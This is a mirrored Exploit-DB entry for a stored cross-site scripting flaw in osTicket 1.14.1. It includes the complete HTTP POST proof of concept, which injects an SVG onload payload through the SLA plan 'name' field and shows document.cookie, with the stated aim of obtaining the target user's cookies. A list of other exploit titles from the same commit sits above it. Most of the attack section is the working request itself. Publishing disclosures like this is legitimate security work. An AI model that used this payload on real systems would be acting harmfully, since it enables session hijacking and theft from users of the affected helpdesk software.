bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/48413.txt
Offensive Security cc95715dc2 DB: 2020-05-06 
10 changes to exploits/shellcodes

Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path

Saltstack 3000.1 - Remote Code Execution

BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection
Fishing Reservation System 7.5 - 'uid' SQL Injection
Online Scheduling System 1.0 - 'username' SQL Injection
webERP 4.15.1 - Unauthenticated Backup File Access
PhreeBooks ERP 5.2.5 - Remote Command Execution
SimplePHPGal 0.7 - Remote File Inclusion
NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
2020-05-06 05:01:49 +00:00

34 lines
No EOL
1.4 KiB
Text
Raw Blame History

# Title: osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting
# Author: Mehmet Kelepce / Gais Cyber Security
# Date : 2020-03-24
# Source Link: https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884
# Vendor: http://osticket.com
# Remotely Exploitable: Yes
# Dynamic Coding Language: PHP
# CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)
## this vulnerability was found by examining the source code.
PoC : Ticket SLA Plan Name - HTTP POST REQUEST
##########################################################
POST /upload/scp/slas.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/upload/scp/slas.php?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Connection: close
Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv
Upgrade-Insecure-Requests: 1
submit=Save+Changes&__CSRFToken__=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0&notes=
Vulnerable parameter: name
Parameter file: /scp/slass.php
I used the name of the SLA for any ticket.
## Risk : cookie information of the target user is obtained.
Reference in a new issue View git blame Copy permalink